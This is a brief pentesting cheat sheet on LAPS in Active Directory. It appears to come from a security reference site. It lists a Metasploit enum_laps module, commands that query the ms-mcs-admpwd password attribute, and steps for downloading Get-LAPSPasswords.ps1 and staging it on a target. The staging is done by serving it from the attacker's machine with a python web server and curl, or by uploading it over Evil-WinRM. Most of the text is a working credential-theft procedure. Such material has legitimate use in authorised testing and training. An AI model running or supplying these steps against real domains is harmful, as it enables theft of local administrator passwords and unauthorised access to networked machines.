LAPS (Local Administrator Password Solution) Pentesting

Last modified: 2022-12-22

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory.

Enumeration

msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit

First, check if you are in the LAPS_Readers group.

net user <current-username>
# Global Group memberships  *LAPS_Readers

Get-ADComputer gets the information of the Active Directory computer.

Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'

Download the Payload in Local Machine

If you are in LAPS_Readers, you can get the administrator's password using Get-LAPSPasswords.ps1.
```
wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
```

Transfer the Payload to Target Machine

via PowerShell

First off, open web server in local machine.

python3 -m http.server 8000

Then curl in target machine

curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1

via Evil-WinRM

If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding -s flag when connecting.

evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory

Then just execute the payload in evil-winrm console.

PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1